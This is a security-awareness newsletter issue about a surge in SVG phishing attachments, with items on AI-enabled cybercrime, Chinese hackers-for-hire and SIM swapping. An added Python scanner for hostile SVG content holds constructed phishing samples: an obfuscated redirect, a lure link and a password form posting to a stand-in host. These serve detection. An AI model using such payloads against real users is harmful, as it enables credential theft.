CyberheistNews Vol 15 #11 [Heads Up] 245% Increase in SVG Files Used to Obfuscate Phishing Payloads




CyberheistNews Vol 15 #11  |   March 18th, 2025

[Heads Up] 245% Increase in SVG Files Used to Obfuscate Phishing Payloads

By Stu Sjouwerman, SACP

The KnowBe4 Threat Research team has observed a sustained increase in the use of Scalable Vector Graphics (SVG) files to obfuscate malicious payloads.

SVGs are vector-based rather than pixel-based like PNGs and JPGs: the file describes shapes as XML text, so the graphic can be scaled up without loss of quality, which makes the format popular for sharing logos and icons via email.

In a now well-established pattern (think QR codes and quishing attacks), cybercriminals are attempting to take advantage of the growing use of this file type, hoping familiarity will lead to complacency in the targets of their phishing attacks.

SVG files also offer technical advantages to cybercriminals looking to evade traditional email security filters: because an SVG is XML text rather than a bitmap, it can carry hyperlinks, embedded HTML and script that run when the recipient opens the file in a browser, while many filters still treat it as a harmless image. Our Threat Research team analyzed phishing emails sent between January 1 and March 5, 2025, and found that SVG files accounted for 6.6% of malicious attachments in phishing emails detected by KnowBe4 Defend, a leading Integrated Cloud Email Security product for M365.

This is a 245% increase compared to attacks sent between October 1 and December 31, 2024, when SVGs made up only 1.9% of malicious attachments. The largest spike to date occurred on March 4, when SVGs accounted for 29.5% of all malicious attachments.
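The reason an SVG can hide a phishing payload at all is that it is XML, not a bitmap. The scanner below is an added example for this item; it is not KnowBe4 code and is not taken from the linked blog post. It parses an SVG attachment and flags the constructs a phishing SVG needs: <script> elements, on* event-handler attributes, javascript:/data: URIs, <foreignObject> wrappers around HTML, decoder calls such as atob() inside script, and any external link that turns the "image" into a clickable lure. The sample SVGs and the example.invalid hostnames are constructed for the demo.

```python
"""Heuristic scan of SVG e-mail attachments for active content (added example)."""
import re
import xml.etree.ElementTree as ET

# Elements that turn an "image" into a document with behaviour.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# Attributes whose value is a URL: may point at a phishing page or carry
# a javascript:/data: payload.
URL_ATTRS = {"href", "src", "action", "formaction"}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)          # onload, onclick, ...
DANGEROUS_SCHEME = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.I)
DECODER_CALL = re.compile(r"\b(atob|eval|unescape|Function)\s*\(")
# Finding classes that should stop delivery outright.
BLOCKING = {"unparseable-xml", "root-not-svg", "active-element",
            "event-handler", "dangerous-uri", "obfuscation"}


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def scan_svg(data):
    """Return a list of 'class: detail' findings; an empty list is clean.

    Input that does not parse is reported rather than ignored: a filter that
    passes through what it cannot parse is exactly what an attacker relies on.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable-xml: {exc}"]

    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root-not-svg: {_local(root.tag)}")

    for elem in root.iter():                # depth-first, root first
        name = _local(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"active-element: <{name}>")
        if name == "script" and DECODER_CALL.search(elem.text or ""):
            findings.append("obfuscation: decoder call inside <script>")
        for attr, value in elem.attrib.items():
            aname = _local(attr)            # xlink:href and href both -> href
            if EVENT_ATTR.match(aname):
                findings.append(f"event-handler: {aname}")
            elif aname in URL_ATTRS:
                if DANGEROUS_SCHEME.match(value):
                    findings.append(f"dangerous-uri: {aname}={value[:40]}")
                elif value.lower().startswith(("http://", "https://")):
                    findings.append(f"external-link: {value[:80]}")
    return findings


def verdict(data):
    """Collapse findings into a mail-flow decision: allow, review or block."""
    findings = scan_svg(data)
    if any(f.split(":", 1)[0] in BLOCKING for f in findings):
        return "block"
    return "review" if findings else "allow"


# Constructed samples, not real attachments; example.invalid is a reserved name.
BENIGN_LOGO = b"""<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">
  <circle cx="32" cy="32" r="30" fill="#0a7"/>
</svg>"""

# Redirects to a credential-harvesting page when opened in a browser;
# the base64 string decodes to https://example.invalid/login.
PHISH_REDIRECT = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="init()">
  <script>window.location=atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvbG9naW4=')</script>
</svg>"""

# No script at all: the "image" is just a clickable lure.
PHISH_LINK = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="https://example.invalid/voicemail"><text x="10" y="20">Play voicemail</text></a>
</svg>"""

# HTML login form smuggled inside the SVG via <foreignObject>.
PHISH_FORM = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <foreignObject width="400" height="300">
    <div xmlns="http://www.w3.org/1999/xhtml"><form action="https://example.invalid/post"><input name="pw"/></form></div>
  </foreignObject>
</svg>"""

if __name__ == "__main__":
    for label, svg in [("logo", BENIGN_LOGO), ("redirect", PHISH_REDIRECT),
                       ("link", PHISH_LINK), ("form", PHISH_FORM)]:
        print(f"{label:9s} {verdict(svg):6s} {scan_svg(svg)}")
```

An external-link finding on its own means the picture is a clickable redirector and warrants review rather than an automatic block; anything in the blocking set should be quarantined. The parser is the standard library's expat wrapper, which does not fetch external entities, but it is still exposed to entity-expansion bombs, so a production filter should impose a size limit or use defusedxml.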

Blog post with links, graphs, screenshots and technical background:
https://blog.knowbe4.com/245-increase-in-svg-files-used-to-obfuscate-phishing-payloads

Building Your Most Robust Defense Against Advanced Phishing Attacks

Sophisticated phishing attacks are bypassing traditional defenses, putting your users at unprecedented risk. With 68% of data breaches involving a human element, you need a multi-layered approach that goes beyond secure email gateways (SEGs).

Transform your employees from vulnerabilities into active cybersecurity assets while strengthening your email security.

Join us for a live demo showcasing how KnowBe4 Defend and PhishER work together. Get the most robust defense against advanced phishing attacks while streamlining your incident response process.

See how KnowBe4 Defend and PhishER can help you:

  • Detect and prevent advanced phishing attacks, including Business Email Compromise, before they reach your users' inboxes
  • Rapidly identify, respond to and remediate threats that bypass your other defenses
  • Reduce the burden on your IT and security teams through intelligent automation
  • Continuously educate and engage your users in security best practices
  • Gain comprehensive visibility into email-based risks and user behavior unique to your organization

Tap into the power of proactive threat detection and efficient incident response to build your most robust email security infrastructure yet.

Date/Time: TOMORROW, Wednesday, March 19 @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/phisher-defend-demo?partnerref=CHN2

Make Your Real Emails Less Phishy

By Roger Grimes

I infrequently get emails from customers who are frustrated because their employer sent out some legitimate mass email to all employees that unfortunately had all the hallmarks of a malicious phishing attack.

Everyone gets worked up about it, and a large percentage of people report it as a possible phishing attack. And it is not. It is just frustrating.

Sound familiar?

Note: Out of all the cybersecurity problems you can have, this is not a bad one; people reporting "phishy" things is better than people clicking on real phishing links.

But it is still frustrating. Everyone who sends emails or any other communications should strive to make them seem less phishy, especially people who create and send mass emails. You would think they automatically know how to do this, but it is apparent that many people who are working hard get caught up in the moment and craft and send something that is, let's say, sub-optimal.

If you have someone like that in your environment, spread the word: do not send emails that look a lot like phishing attacks.

What Do I Mean by Less Phishy?

Paraphrasing Supreme Court Justice Potter Stewart's statement in a 1964 obscenity case, "I can't describe it, but I know it when I see it!"

Here are the signs of an email that might be mistaken for a phishing attack.

[CONTINUED] At the KnowBe4 Blog with a list of points to watch for:
https://blog.knowbe4.com/make-your-real-emails-less-phishy

[FREE RESOURCE KIT] Phishing Security Resources

Phishing emails increase in volume annually, so we created this free resource kit to help you defend against attacks. Request your kit now to learn phishing mitigation strategies, what new trends and attack vectors you need to be prepared for, and our best advice on how to protect your users and your organization.

Here is what you'll get:

  • Access to our free on-demand webinar Your Ultimate Guide to Phishing Mitigation featuring Roger A. Grimes, KnowBe4's Data-Driven Defense Evangelist
  • Our most popular phishing whitepaper: Comprehensive Anti-Phishing Guide E-Book
  • A video that explains How to Avoid Phishing Attacks
  • Our most recent quarterly infographic on Top-Clicked Phishing Email Subjects Infographic
  • Posters and digital signage to remind users about what to watch out for

Get Your Free Phishing Security Resources Now!
https://www.knowbe4.com/phishing-resource-kit-chn

AI and AI-Agents: A Game-Changer for Both Cybersecurity and Cybercrime

By Anna Collard

Artificial Intelligence is no longer just a tool—it is a game changer in our lives, our work as well as in both cybersecurity and cybercrime.

While organizations leverage AI to enhance defenses, cybercriminals are weaponizing AI to make these attacks more scalable and convincing.

In 2025, researchers forecast that AI agents, autonomous AI-driven systems capable of performing complex tasks with minimal human input, will revolutionize both cyberattacks and cybersecurity defenses.

While AI-powered chatbots have been around for a while, AI agents go beyond simple assistants, functioning as self-learning digital operatives that plan, execute and adapt in real time. These advancements don't just enhance criminal tactics—they may fundamentally change the cybersecurity battlefield.

How Cybercriminals Are Weaponizing AI: The New Threat Landscape

AI is transforming cybercrime, making attacks more scalable, efficient and accessible. The WEF Artificial Intelligence and Cybersecurity Report (2025) highlights how AI has democratized cyber threats, enabling attackers to automate social engineering, expand phishing campaigns and develop AI-driven malware.

Similarly, the Orange Cyberdefense Security Navigator 2025 warns of AI-powered cyber extortion, deepfake fraud and adversarial AI techniques. And the 2025 State of Malware Report by Malwarebytes notes that, while Generative AI (GenAI) has made cybercrime more efficient, it hasn't yet introduced entirely new attack methods: attackers still rely on phishing, social engineering and cyber extortion, now amplified by AI.

However, this is set to change with the rise of AI agents—autonomous AI systems capable of planning, acting, and executing complex tasks—posing major implications for the future of cybercrime.

Here is a list of common (ab)use cases of AI by cybercriminals:

[CONTINUED] At the KnowBe4 Blog, including a list of mitigation measures:
https://blog.knowbe4.com/ai-and-ai-agents-a-game-changer-for-both-cybersecurity-and-cybercrime

Download Your Ransomware Hostage Rescue Manual

Free your files! Get the most informative and complete hostage rescue manual on ransomware.

This manual is packed with actionable info that you need to prevent infections, and what to do when you are hit with ransomware. You will also receive a Ransomware Attack Response Checklist and Ransomware Prevention Checklist.

You will learn more about:

  • What is ransomware?
  • Am I infected?
  • I'm infected, now what?
  • Protecting yourself in the future
  • Resources

Don't be taken hostage by ransomware. Download your rescue manual now!

Download Now:
https://info.knowbe4.com/ransomware-hostage-rescue-manual-chn

Did You Know?

KnowBe4 has a library of the most popular webinars we have hosted. Some of these had thousands of people attending the initial event, and they are still watched by substantial numbers of people every week.

At the moment, the featured webinar is:

Code Red: How KnowBe4 Exposed a North Korean IT Infiltration Scheme

Watch this exclusive, no-holds-barred conversation with the team who lived through it. Perry Carpenter, our Chief Human Risk Management Strategist, sits down with Brian Jack, Chief Information Security Officer, and Ani Banerjee, Chief Human Resources Officer, to chat about how we spotted the red flags and stopped it before any damage was done.

Highly recommended! See it here:
https://www.knowbe4.com/webinar-library


Let's stay safe out there.

Warm Regards,

Stu Sjouwerman, SACP
Founder and CEO
KnowBe4, Inc.

PS: [BUDGET AMMO #1] Five Coercive Tactics Used By Ransomware Operators To Pressure Victims Into Paying via @forbes:
https://www.forbes.com/councils/forbestechcouncil/2025/03/10/five-coercive-tactics-used-by-ransomware-operators-to-pressure-victims-into-paying/

PPS: [BUDGET AMMO #2] Beware of DeepSeek Hype: It's a Breeding Ground for Scammers:
https://www.securityweek.com/beware-of-deepseek-hype-its-a-breeding-ground-for-scammers/

Quotes of the Week
"A generation which ignores history has no past and no future."
- Robert A. Heinlein, Writer (1907 - 1988)

"We learn from history that we learn nothing from history."
- George Bernard Shaw, Writer (1856 - 1950)

Thanks for reading CyberheistNews

You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-15-11-heads-up-245-increase-in-svg-files-used-to-obfuscate-phishing-payloads

Security News

U.S. Justice Department Charges China's Hackers-for-Hire Working for IT Contractor i-Soon

The U.S. Justice Department has charged ten Chinese nationals for acting as hackers-for-hire for the Chinese government.

The defendants worked for Chinese IT contractor i-Soon, which is accused of offering hacking services for China's Ministry of Public Security (MPS) and Ministry of State Security (MSS).

According to the FBI, the hackers compromised "US-based critics of the Chinese government and Chinese dissidents, a US news organization, a large US-based religious organization, multiple governments in Asia and US federal and state government agencies."

The DOJ says i-Soon was paid up to $75,000 for each email account that was breached. "i-Soon and its employees, to include the defendants, generated tens of millions of dollars in revenue as a key player in the PRC's hacker-for-hire ecosystem," the Justice Department says.

"In some instances, i-Soon conducted computer intrusions at the request of the MSS or MPS, including cyber-enabled transnational repression at the direction of the MPS officer defendants.

"In other instances, i-Soon conducted computer intrusions on its own initiative and then sold, or attempted to sell, the stolen data to at least 43 different bureaus of the MSS or MPS in at least 31 separate provinces and municipalities in China. i-Soon charged the MSS and MPS between approximately $10,000 and $75,000 for each email inbox it successfully exploited.

"i-Soon also trained MPS employees how to hack independently of i-Soon and offered a variety of hacking methods for sale to its customers."

The FBI notes that i-Soon is just one of many Chinese security firms contracted by the Chinese government to carry out hacking operations against its targets.

"China's InfoSec ecosystem flourishes because China's government agencies, including its primary intelligence service the Ministry of State Security (MSS) and its domestic police agency the Ministry of Public Security (MPS), weaponize InfoSec companies by tasking companies that advertise legitimate cybersecurity services to also use their expertise to gain unauthorized access to victim networks to collect for China's intelligence services," the Bureau says.

"This ecosystem of InfoSec companies and freelance hackers enables and encourages indiscriminate global cyber activity, while providing the Chinese government with a layer of plausible deniability."

KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 platform to strengthen their security culture and reduce human risk.

Blog post with links:
https://blog.knowbe4.com/us-justice-department-charges-chinas-hackers-for-hire

Protect Yourself: Social Engineering Fuels SIM Swapping Attacks

Group-IB has published a report on SIM swapping attacks, finding that attackers continue to use social engineering to bypass technical security measures.

SIM swapping is a technique in which an attacker takes over a victim's phone number by tricking the telecom operator into reassigning it to a SIM card the attacker controls. Once the number is theirs, they receive the victim's calls and text messages, including SMS-based one-time codes, and can use them to take over the victim's accounts.

"SIM swapping fraud typically begins when the fraudster acquires sensitive information about the victim, such as their national ID, phone number and card details," Group-IB explains. "This information is often obtained through phishing websites that mimic legitimate services or via social engineering tactics.

"Once armed with the necessary details, the fraudster initiates a request to swap or port out the victim's SIM. This may involve converting the victim's SIM to an eSIM with the same mobile network provider or porting the number to a different local telecom operator. These requests are often submitted through telecom provider mobile apps, enabling the process to be completed remotely."

Mobile carriers have safeguards in place to prevent SIM swapping, but attackers can bypass these using social engineering. In some cases, the attackers also target the victims themselves and trick them into authorizing the switch.

"In some regions, this process is safeguarded by a Government E-Verification Platform, which requires users to verify their identity before any SIM swap or port-out request is approved," the researchers write. "Verification methods may include approving a login request or using biometric authentication.

"To bypass these safeguards, fraudsters deceive victims into approving the verification request, often by posing as representatives of legitimate services—such as job applications or account updates.

"Once the victim unknowingly authorizes the request, the telecom provider deactivates the existing SIM and activates a new one under the fraudster's control. With control of the victim's phone number, fraudsters can intercept SMS-based two-factor authentication (2FA) codes and carry out unauthorized transactions."

Blog post with links:
https://blog.knowbe4.com/protect-yourself-social-engineering-fuels-sim-swapping-attacks

What KnowBe4 Customers Say

"Hi Stu, Yes, we are extremely happy with KnowBe4. Support assistance has been stellar. We have completed our baseline phishing and are embarking on a 'holiday' themed one shortly to test our staff, after already sending out several training campaigns.

"And our HR department is simply loving the ability to upload policy documents and send out as training assignments where they are able to track each individual's sign off.

"We still have a ways to go in training our staff to be vigilant, with so many people being service field workers and not tech savvy, but they are getting better. Thank you so much for reaching out!"

- S.L., Team Lead, Business Systems, IT

The 10 Interesting News Items This Week
  1. ClickFix: How to Infect Your PC in Three Easy Steps:
    https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/

  2. KnowBe4 Research Reveals a Confidence Gap in Cybersecurity, Leaving Organizations at Risk:
    https://www.morningstar.com/news/globe-newswire/9392246/knowbe4-research-reveals-a-confidence-gap-in-cybersecurity-leaving-organizations-at-risk

  3. The AI race: Dark AI is in the lead, but good AI is catching up:
    https://www.bleepingcomputer.com/news/security/the-ai-race-dark-ai-is-in-the-lead-but-good-ai-is-catching-up/

  4. 95% of data breaches involve human error, report reveals:
    https://www.scworld.com/news/95-of-data-breaches-involve-human-error-report-reveals

  5. Despite FBI And CISA Ransomware Advice, The Hackers Must Be Laughing:
    https://www.forbes.com/sites/daveywinder/2025/03/13/fbi-warning-enable-2fa-for-gmail-outlook-and-vpns-now/

  6. US cities warn of wave of unpaid parking phishing texts:
    https://www.bleepingcomputer.com/news/security/us-cities-warn-of-wave-of-unpaid-parking-phishing-texts

  7. Suspected LockBit Ransomware Developer Extradited to US:
    https://www.govinfosecurity.com/suspected-lockbit-ransomware-developer-extradited-to-us-a-27727

  8. Water utilities would get cybersecurity boost under bipartisan Senate bill:
    https://cyberscoop.com/rural-water-utilities-cybersecurity-senate-bill/

  9. Symantec says AI agents can already be used to launch phishing campaigns:
    https://www.security.com/threat-intelligence/ai-agent-attacks

  10. North Korean threat actors plant malicious apps in the Google Play Store:
    https://www.lookout.com/threat-intelligence/article/lookout-discovers-new-spyware-by-north-korean-apt37

Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff
